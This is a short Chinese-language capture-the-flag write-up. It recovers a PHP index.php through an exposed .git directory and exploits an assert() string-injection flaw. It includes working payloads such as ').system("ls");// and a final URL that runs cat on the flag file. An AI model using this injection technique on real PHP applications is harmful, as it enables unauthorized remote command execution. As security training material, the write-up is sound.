这题也挺有想法 第一次确实没有想到
首先我们可以扫出 git
然后
我们githack 泄露一下
然后我们看index.php代码
<?php
if (isset($_GET['page'])) {
$page = $_GET['page'];
} else {
$page = "home";
}
$file = "templates/" . $page . ".php";
// I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
// TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!");
问题代码出现在
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!");
这里的参数是可以闭合的 因为是可控的
我们构造 ')
assert("strpos('')', '..') === false") or die("Detected hacking attempt!");
然后我们可以在后面面接上其他php语句
这里有两个
').system("ls");//
或者
') or system("ls");//
最后payload
就是替换为cat即可
/?page=').system("cat ./templates/flag.php");//